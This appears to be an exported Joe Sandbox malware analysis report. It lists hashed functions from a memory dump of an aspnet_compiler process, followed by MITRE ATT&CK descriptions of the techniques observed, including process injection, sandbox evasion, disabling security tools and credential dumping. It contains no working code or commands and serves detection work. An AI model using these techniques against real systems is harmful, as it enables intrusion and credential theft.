Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e33c80a3111aded61a0f0fe9266004b14300ecf70870dc48ca27600d240f135e
Instruction ID: f921a5c8a600da860489935f380797cef8d5a2dc141cf216cecb9dd69ebb209e
Opcode Fuzzy Hash: e33c80a3111aded61a0f0fe9266004b14300ecf70870dc48ca27600d240f135e
Instruction Fuzzy Hash: A2310231C0C68A9FE791BB68A8655FC7BE0FF85260F04017AD489975D2CE2C2C438B15

Function 00007FF848FE6091 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d301cec05dc463e0d082e5a5c8b84dd8795471a8ddf79c5e8fae060b9457e818
Instruction ID: da932ff2d39a819ed96c25ae75cd532167817f336f040c3b5d1ecebd0ae841ff
Opcode Fuzzy Hash: d301cec05dc463e0d082e5a5c8b84dd8795471a8ddf79c5e8fae060b9457e818
Instruction Fuzzy Hash: A931F171D0D64E9FE746AB68D4296B9BBE0FF44360F0401BAC049C71C2EA2C1846C766

Function 00007FF848FE761A Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 727d178a00a18c94c29b59a6b9303c5d0eae347c6d346df105b90cccc8f34324
Instruction ID: b786e30a087210272aef73bf98db09b003941a73ea47acae3ad5393491d2b753
Opcode Fuzzy Hash: 727d178a00a18c94c29b59a6b9303c5d0eae347c6d346df105b90cccc8f34324
Instruction Fuzzy Hash: E8416730C0E6898FDB5AEB64C865AF8BBB1EF16310F0541EAD049D72D2DB3C5A85CB15

Function 00007FF848FE65EA Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a9b086cf5439690f95d87aac40d53c67fbb2950b5f334cd6423b3e15886586b
Instruction ID: c98201ddea0a2f4629cff7541c2f3b8fc759db587b6c423ac26479629a879765
Opcode Fuzzy Hash: 5a9b086cf5439690f95d87aac40d53c67fbb2950b5f334cd6423b3e15886586b
Instruction Fuzzy Hash: B6417871C1D64D8FEB54EBA8C8596ACBBB1FF45384F0001AAD009AB292DF3D6885CB11

Function 00007FF848FE0748 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c12854f167822328b923a87ff35c13f8fea9e7ad95c796e6a2b4746f4f695b93
Instruction ID: c8a067793c342f74ec9efbb6d8554b0ef357491c572a0afc7dc55d22edf11f40
Opcode Fuzzy Hash: c12854f167822328b923a87ff35c13f8fea9e7ad95c796e6a2b4746f4f695b93
Instruction Fuzzy Hash: 6531D031C1C68A9FE795BB68A8691FC7BE0FF85260F050179D489975D3CE2C28438B15

Function 00007FF848FE54EB Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 537d8dba99723da860db57fb0e3e6ffe49283fe0a5756dbdb82fca566ad58dbd
Instruction ID: e422e55cbab47c13a4043f174ab516f4ef18e0d4daec09062463b417517d7a7d
Opcode Fuzzy Hash: 537d8dba99723da860db57fb0e3e6ffe49283fe0a5756dbdb82fca566ad58dbd
Instruction Fuzzy Hash: C5315A70C0AA099FDB40AFA8D84D2BCFBF0EF09341F5404BAD009E71A1DB396982CB44

Function 00007FF848FE0CE4 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 562b6e08f4c4c796dcdef24bef0381322ee633df6b8274360f150a1c5e5be544
Instruction ID: 29aaeacf54c10e829fa4f2ca289d1fb60ee5c1c5d6269f6fc1318aba815e8b09
Opcode Fuzzy Hash: 562b6e08f4c4c796dcdef24bef0381322ee633df6b8274360f150a1c5e5be544
Instruction Fuzzy Hash: F331E770909A5D9FDB91EB78881EBAABBF0FF49301F1440E9C04DD7261DA3859828F01

Function 00007FF848FE5C98 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 594b9089cfd82bacf479fab53127356fe4bae2cbc9a05735991ed79962421164
Instruction ID: 9bc39b58008a6f26c98d424dba347dbe0d2d27835ecb9288644b0c8331436bf0
Opcode Fuzzy Hash: 594b9089cfd82bacf479fab53127356fe4bae2cbc9a05735991ed79962421164
Instruction Fuzzy Hash: A221477088E3C65FC3035BB08C286A67FB4AF4B250B0A05E7E485CB0A3D65C195AC766

Function 00007FF848FE1DA9 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abd9d3265930eb48cb52ae5e97923bf6f153d62dc2f7fa41ce7cb58ab4011192
Instruction ID: 4d641a8de13dca93593a3c051c5d9121c4af07cdc39c0de58dd02025a72c9bea
Opcode Fuzzy Hash: abd9d3265930eb48cb52ae5e97923bf6f153d62dc2f7fa41ce7cb58ab4011192
Instruction Fuzzy Hash: 9B21BE71D0964C8FDF81EBA8C8596EDBBB0FF18301F0501AAD048E76A2DB289845CB01

Function 00007FF848FE8412 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea706bb915841cd7a57887589c4c004be1ea4cf2a92b38c2cc0ebfea290d2874
Instruction ID: 33dbbfc1c72eff0d5efa9eb80a311ef8ea463070c4ed561b37475268af3d313f
Opcode Fuzzy Hash: ea706bb915841cd7a57887589c4c004be1ea4cf2a92b38c2cc0ebfea290d2874
Instruction Fuzzy Hash: 8F11BC3188E7C95FE3436B7088296E67FE1EF47320F0900E6D085CB1A3CA2D195AC762

Function 00007FF848FEABB4 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc7aac514b46554a8d76acc463611b4ecef385b3b6b7f1a758952e7f3653e8b5
Instruction ID: fcf6c8d9b61761911d8b3657a9cd4df2f9ba2afb292fc885752cc4aa48231da9
Opcode Fuzzy Hash: fc7aac514b46554a8d76acc463611b4ecef385b3b6b7f1a758952e7f3653e8b5
Instruction Fuzzy Hash: 2021F430C1861E8FEB95EF58C844BEEB7B1FF54304F1441A9D019A2284DB38AA86CF94

Function 00007FF848FEAB8A Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0056095d6a7d8dbb1f07f09f373bc816deb86229c59fcb7c762ef37686f1fc1
Instruction ID: cf1995ca3708ba36810e57289f0764fdac3f9d54a1f9b9d1127bbe738bce7893
Opcode Fuzzy Hash: d0056095d6a7d8dbb1f07f09f373bc816deb86229c59fcb7c762ef37686f1fc1
Instruction Fuzzy Hash: 71011B70D1864E8FDB99EF58C854AE9B7B1FF58304F1002A9D41993291CB386A86CF54

Function 00007FF848FE5971 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df680e243e1a4cbb132daf5096054b3fa09bf39bc96ac9aa088eab0b25e0e74
Instruction ID: 793dbb2211f5a9d8c7f2556d2fda85728f632f42bcd189e81499d6654f686795
Opcode Fuzzy Hash: 1df680e243e1a4cbb132daf5096054b3fa09bf39bc96ac9aa088eab0b25e0e74
Instruction Fuzzy Hash: F8F0BE70C0E68D8FE751AF2088493FCBEB0EF1A310F0414A6D408D60A2EB28A454834A

Function 00007FF848FEAB98 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0daf4cda0df1fc46d2e151ef349657e4fdba0ea5807c8b1d6aa55f4a6cea232
Instruction ID: 608837b51f595ea0607b88db1c81f6df770a54ad2749ecf145ffda0219e20c71
Opcode Fuzzy Hash: b0daf4cda0df1fc46d2e151ef349657e4fdba0ea5807c8b1d6aa55f4a6cea232
Instruction Fuzzy Hash: 6801E570D1861E8FEB9AEF58C845BE9B7B1FF58314F1001A9D41993291DB38AA86CB44

Function 00007FF848FE7771 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 499caa8fe1609b35af470b7d23efe78872f2d17231485374e26bab1d595366ae
Instruction ID: caf17d843897090332f5220c5b2f71c78ecf9020ec285c1b72a0e350d3c9e8b7
Opcode Fuzzy Hash: 499caa8fe1609b35af470b7d23efe78872f2d17231485374e26bab1d595366ae
Instruction Fuzzy Hash: 150169708096599FDB91EB288455BE9BBF0EF59301F2481EAC088E7290C7784EC6CB41

Function 00007FF848FEABA1 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b5b8380ead2d1221885e5ef81833129cf87e4946af7dddd3f56ed5d055118dc
Instruction ID: 3978fdc7fb600c59ecc7271b7dface6967099858201c97b7b5036c76b9ef5d90
Opcode Fuzzy Hash: 6b5b8380ead2d1221885e5ef81833129cf87e4946af7dddd3f56ed5d055118dc
Instruction Fuzzy Hash: 05011A70C186198FDB99EF08C444BADB7F1FF58304F1001A9D409D3290DB38AA85CB44

Function 00007FF848FEABAB Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 777757b023364faafd7ed8a18783c5b3f042b1d05b591387336a07a85a9f219c
Instruction ID: 8f7b2855de35c32f3dc9451ded5ec4715c2bec1e908b482b2c1a9e3f3bec7ee6
Opcode Fuzzy Hash: 777757b023364faafd7ed8a18783c5b3f042b1d05b591387336a07a85a9f219c
Instruction Fuzzy Hash: E5F0E774C1860A8FEB99EF58C845BE9B7B1EF54304F1402A8D419E3290DB38AA86CB54

Function 00007FF848FE6A2C Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b414820be84efb161d3eb61f4a8cb85da2d3a38677ea7a13db06a3a3c30d02ec
Instruction ID: 50ac9b7a63cc16d4d898b0461e240c2a6b9366bd4d1a8450e5523a9efe638fb8
Opcode Fuzzy Hash: b414820be84efb161d3eb61f4a8cb85da2d3a38677ea7a13db06a3a3c30d02ec
Instruction Fuzzy Hash: 1EF0BE30A1A6499FD756EF74C85668CBBB0FF0A310F1001EDD0489B2A2DB398882CB44

Function 00007FF848FE74D1 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df3a2561b2a41cb1ac491e4723e2b7a226d61cec6bcd4df772213575a5b43c5a
Instruction ID: ce2d947e05302d3357519dfcdadc9e1e3c27d2c880006d48302f7a2dc09ac3bd
Opcode Fuzzy Hash: df3a2561b2a41cb1ac491e4723e2b7a226d61cec6bcd4df772213575a5b43c5a
Instruction Fuzzy Hash: 4CF0F831D0DB9C9FCF91EB58D844AADBBB0EF55210F4002EAD49ED7196CB3469808B58

Function 00007FF848FE6AB6 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf1c50d70f09a603efec78650a182d40f9c8dc74163b33077122af129e898f4c
Instruction ID: cf1bbd17c10b80c76ffcabfbc73e9a1b4c59fc8a041fe4daa5887f19d8236766
Opcode Fuzzy Hash: bf1c50d70f09a603efec78650a182d40f9c8dc74163b33077122af129e898f4c
Instruction Fuzzy Hash: B8F05E70A1A658CFD746DF64D8A56D9BBF0FF49300F0400EDC009A7262CB385841CB55

Function 00007FF848FE0C12 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33c6892b939130588bf4a7a6205af1c6abb61e0d3a88a498f0aea52a8f343b92
Instruction ID: 5f987becb03a15f7eafa756d050282981b2c9ea2730452e091544dbd94e70ee0
Opcode Fuzzy Hash: 33c6892b939130588bf4a7a6205af1c6abb61e0d3a88a498f0aea52a8f343b92
Instruction Fuzzy Hash: 2DF09270908A5D9FDB95EB78885AAD9BBF1FF68311F1040E9C08DE7251DA785AC28F40

Function 00007FF848FE0E1F Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bda1f79bde357eb601ea5f59bc9fed9964e6b8db8adafd583e6fbb796848520
Instruction ID: 0318fa7ccc0890f56414660a17a6c183349ccd933929adc5ee981bf12c463e33
Opcode Fuzzy Hash: 2bda1f79bde357eb601ea5f59bc9fed9964e6b8db8adafd583e6fbb796848520
Instruction Fuzzy Hash: D1F09270A0AA599FEB91EF68C859AEABBB1FF59311F1000D9C049D7255DB389982CF01

Function 00007FF848FE0C7B Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90169904ce800172636e961fbe50d003346f5b46bb358b352be239a5702eda27
Instruction ID: d09997021ce42add6f8a8c62c6f6d597271a6abe66b66404506f3751f4ce6b79
Opcode Fuzzy Hash: 90169904ce800172636e961fbe50d003346f5b46bb358b352be239a5702eda27
Instruction Fuzzy Hash: 6AF098709156599FDB91EB3888596A9B7F1FF58311F1000E9D449D7151DA345A82CF00

Function 00007FF848FE0B40 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50583180c97fc5732457b76cf7182b6e4b6e9bc40855b72acf6f7dff8cb098de
Instruction ID: 28a9b738b0bb09127c2d9a50e02c071174853205b069e26442dd0a6c9fa79713
Opcode Fuzzy Hash: 50583180c97fc5732457b76cf7182b6e4b6e9bc40855b72acf6f7dff8cb098de
Instruction Fuzzy Hash: F0F0F230809A2C9FEB90EB68C859B99BBB0FF58200F0041DAC00DE7250DA3859868F10

Function 00007FF848FE0BA9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cebc010ccac316c23c24b4e8367c87ab065c60741232d1e0e4e473f300f56d0
Instruction ID: a5a8d59836c895ea559bbe8617fab1818aeddf662ddf64910d9669f30040b042
Opcode Fuzzy Hash: 4cebc010ccac316c23c24b4e8367c87ab065c60741232d1e0e4e473f300f56d0
Instruction Fuzzy Hash: B0F0F83080465A8FDBA0EB28C859BA9B7B0FF54200F0480E9C00EE7551DA3859C58F40

Function 00007FF848FE0AA0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8d29690952642fed59a95d0b55a3b2c8ae91769166a1e59fa5147218b2cd326
Instruction ID: c401c52fa7def76d072b2763d0566045396d53f051636c93c020efeec5830884
Opcode Fuzzy Hash: d8d29690952642fed59a95d0b55a3b2c8ae91769166a1e59fa5147218b2cd326
Instruction Fuzzy Hash: C5F09270909A589FDB90EB38C85AB99BBB1FB15201F0040DAD04DE7261DE3459858F01

Function 00007FF848FE0AF3 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0633b1041f3ab772849ff818e62528a3bda8f3443eac1817234e5c5b30f36eb9
Instruction ID: 43c68fb8e8ba88e560076d34b9c3b73f71b2238d222d65cf070943f2133dfffc
Opcode Fuzzy Hash: 0633b1041f3ab772849ff818e62528a3bda8f3443eac1817234e5c5b30f36eb9
Instruction Fuzzy Hash: 3EE0B670909A589FDB90EB788469B9ABBF1AB15211F0440D9C049D7160DB345985CF02

Function 00007FF848FE0F3D Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96955e427323aa17863e1a333469a72035b4742e1942b902b6ff74dc74f4107a
Instruction ID: 933f923ae565b4b2d790838dd847b2fe00830a890d756d96796058c32260382e
Opcode Fuzzy Hash: 96955e427323aa17863e1a333469a72035b4742e1942b902b6ff74dc74f4107a
Instruction Fuzzy Hash: FCD0127054460A5FC3C1EB788819AF577E1BF49210F0400BAC858C72E6CB2C4C894741

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
